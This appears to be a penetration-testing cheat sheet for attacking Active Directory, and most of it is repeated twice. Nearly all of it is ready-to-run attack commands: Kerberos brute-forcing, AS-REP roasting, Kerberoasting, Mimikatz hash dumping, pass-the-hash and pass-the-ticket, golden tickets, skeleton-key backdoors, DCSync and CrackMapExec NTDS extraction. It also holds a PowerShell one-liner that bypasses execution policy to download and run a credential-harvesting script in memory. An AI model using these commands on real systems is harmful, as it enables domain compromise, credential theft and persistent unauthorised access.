AD
AD Reconnaissance
Returns user on the machine
net userShow the current user
whoamiShow the current group
whoami /groupsShow users from any group
net user /domainShows every user's group
net user [username] /domainPowershell cmd to get all properties of a certain user
Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *Build LDAP filter to look for users with SPN values registered for current domain
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
$Results = foreach ($result in $results) {
$result_entry = $result.GetDirectoryEntry()
$result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName }}, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 }}
}
$ResultsDomain Discovery
# Identify the domain
net view /domain
# List of users in the domain
net user /domain
# List of groups on the domain
net group /domain
# Display list of file and printer shares on a specified computer
net view \\computerName
# Display shares including hidden shares on a remote computer
net view \\computername /all
# List of shares on a remote Netware computer
net view /network:nw
# List all available servers on a specified domain
net view /domain:[domain name]
# Find the domain name of the current system
systeminfo | findstr /B /C:"Domain"
# Find logged in user's domain
echo %userdomain%
# Find domain name using WMIC
wmic computersystem get domainKerberos Reconnaissance - PRE-Auth
Bruteforce for valid usernames in the pre-auth process of a DC
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/Active-Directory-Wordlists/User.txtBruteforce passwords for a specific user
./kerbrute bruteuser --dc cpent.localnet -d cpent.localnet /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt administrator AS-REP Roasting
Identify users that have Kerberos preauthentication disabled
Get-aduser -filter { UserAccountControl -band 4194304 } | foreach {
$User = $_
Get-ADPrincipalGroupMembership -Identity $User | Select-Object @{ Name = "User"; Expression = { $User.SAMAccountName }}, DistinguishedName, SAMAccountName
} | Export-Csv test.csvRubeus on Windows
Rubeus.exe asreproastHarvest TGT every 30 seconds
Rubeus.exe harvest /interval:30Perform a password spray against all found users
Rubeus.exe brute /password:Password1 /noticketPerform Kerberoasting
Rubeus.exe kerberoastCrack AS-REP hashes with hashcat
hashcat -m 18200 hash.txt Pass.txtMimikatz Commands
Ensure administrator privileges
privilege::debugElevate privileges to system
token::elevateDump NTLM hashes
lsadump::samPass the hash
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6fMetasploit Commands
Dump all hashes and crack them with hashcat
lsa_dump_samExport all .kirbi tickets
sekurlsa::tickets /exportPerform pass the ticket attack
kerberos::ptt <ticket>Verify impersonated ticket
klistDump the hash of the service account "krbtgt"
lsadump::lsa /inject /name:krbtgt
Get list of all users from ldap
use auxiliary/gather/ldap_query
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNETGet SPN from metasploit
use auxiliary/gather/ldap_query
set action ENUM_USER_SPNS_KERBEROAST
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNETGolden and Silver Tickets
Request a golden ticket
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500Open a new elevated command prompt with the given ticket
misc::cmdMaintain access with a skeleton key
misc::skeletonDCSync
Extract hashes stored in NTDS.DIT
lsadump::dcsync /domain:cpent.local /all /csvKerberoasting from Linux
Get TGT from domain after password compromise
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administratorRequest a TGS ticket and crack it with hashcat
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -requestCrackmapexec Commands
Extract LSA hashes
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsaExtract NTDS database
crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/ --ntdsExtract SAM database
crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/Anotherdomainjoinedserver --samPerform Kerberoasting
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --kerberoasting output.txtHashcat hash cracking
Crack NTLM hashes
hashcat -m 1000 -a 3 hash.txtCrack Kerberos hashes
hashcat -m 13100 kerberoshash -a 0 -o results.txt /usr/share/wordlists/Active-Directory-Wordlists/Pass.txtCrack AS-REP Roasting accounts
hashcat -m 18200 hash.txt Pass.txtJohn the Ripper hash cracking
Crack NTLM hashes with John
john --format=nt hash.txtPowershell Commands
Identify users with Kerberos preauthentication disabled
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Run Invoke-Kerberoast with PowerShell
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"This one-liner instructs PowerShell to relaunch with the ExecutionPolicy set to bypass, enabling untrusted scripts to be run. It downloads the Invoke-Kerberoast.ps1 script, runs it in RAM, and outputs the results ready to crack using hashcat.
nbtstat -a IPNmap for smb
nmap -p 445,138,139 --script=*smb*Mimikatz Commands
# Ensure the command outputs [output '20' OK] to check for administrator privileges
privilege::debug
# Elevate privileges to system level
Token::elevate
# Dump the NTLM hashes from Mimikatz in Windows
lsadump::sam
# Pass the NTLM hash to gain access as the administrator
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f
# Use PsExec to execute commands on a remote machine within the same internal network
PsExec.exe \\172.25.170.110 cmd.exe
# Dump all hashes from Metasploit and crack them with Hashcat if it's an NTLM hash
lsa_dump_sam
# Export all Kerberos tickets into the current directory
sekurlsa::tickets /export
# Perform a "pass the ticket" attack using the harvested ticket
kerberos::ptt
# Verify the successful impersonation of the ticket by listing cached tickets
klist
# Dump the hash of the krbtgt service account
lsadump::lsa /inject /name:krbtgt
# Dump the hash of a specific service account (SQLService)
lsadump::lsa /inject /name:SQLService
# Request a silver ticket for a specific resource by changing the account name
lsadump::lsa /inject /name:Administrator
# Generate a golden ticket for domain access
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500
# Open a new elevated command prompt with the given ticket
misc::cmd
# Backdoor access through Mimikatz by implanting a skeleton key into a domain controller
misc::skeleton
# Example commands to access shares without needing the administrator's password
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatzHash Extraction and Ticket Management
# Extract hashes stored in NTDS.DIT and output as CSV
lsadump::dcsync /domain:cpent.local /all /csv
# Load the Kiwi module for Kerberos
load kiwi
# Request a Kerberos ticket for SPN found by the LDAP query module
kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000
# List current session tickets
kerberos_ticket_list
# Export service tickets using Kiwi extension
kiwi_cmd kerberos::list /export
# Inject a new ticket into memory for authentication
kiwi_cmd kerberos::ptt Administrator.kirbi
# Convert the .kirbi hash to a John or Hashcat compatible format
python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi
# Crack the encrypted password using hashcat with the specified mode
hashcat -m 13100 --force -a 0 hash.txt wordlist.txtActive Directory Reconnaissance
# AD Reconnaissance commands
net user # Returns users on the machine
whoami # Displays the currently logged-in user
whoami /groups # Shows groups for the current user
net user /domain # Shows users from all groups in the domain
# Get properties of a specific user
Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *
# Build an LDAP filter to find users with registered SPN values
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
# Display SPN values from returned objects
$Results = foreach ($result in $results) {
$result_entry = $result.GetDirectoryEntry()
$result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName } }, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 } }
}
$ResultsDomain Discovery Commands
# Domain discovery commands
net view /domain # Identify the domain
net user /domain # List users on the domain
net group /domain # List groups on the domain
net view \\computerName # Display shares on a remote computer
net view \\server.domain\share$ # Show shares including hidden shares
net view /network:nw # List shares on a Netware computer
net view /domain:[domain name] # List all servers on a domain
systeminfo | findstr /B /C:"Domain" # Find the domain name
echo %userdomain% # Display logged-in user's domain
Wmic computersystem get domain # Find domain name with WMICMetasploit and Kerberoasting
# Use Metasploit's LDAP query auxiliary module
use auxiliary/gather/ldap_query
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET
# Get SPNs from Metasploit
use auxiliary/gather/ldap_query
set action ENUM_USER_SPNS_KERBEROAST
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET
# Nbtstat command to check NetBIOS statistics
nbtstat -a IP
# Nmap command for SMB services
nmap -p 445,138,139 --script=*smb*Kerberoasting from Linux
# Kerberoasting from Linux
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator # Get TGT from domain
impacket-GetUserSPNs WS2012-DC/cpent:Pa$$w0rd123 -dc-ip 172.25.170.110 # Request TGS ticket
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request
# Crack SPN with hashcat after Kerberoasting
hashcat -m # Adjust and files as neededKerberoasting from Windows
# Kerberoasting from Windows with options available
Getusersspns.py htb.local/asmith:passw0rd # Get SPNs with cracked user
Getusersspns.py htb.local/asmith:password -request # Request a TGTCrackMapExec Commands
# CrackMapExec commands for various tasks
crackmapexec smb -u username -p 'password' -d --lsa # Extract LSA hashes
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa # Example commandPowershell Command
# Powershell to bypass execution policy
powershell -ep bypassLast updated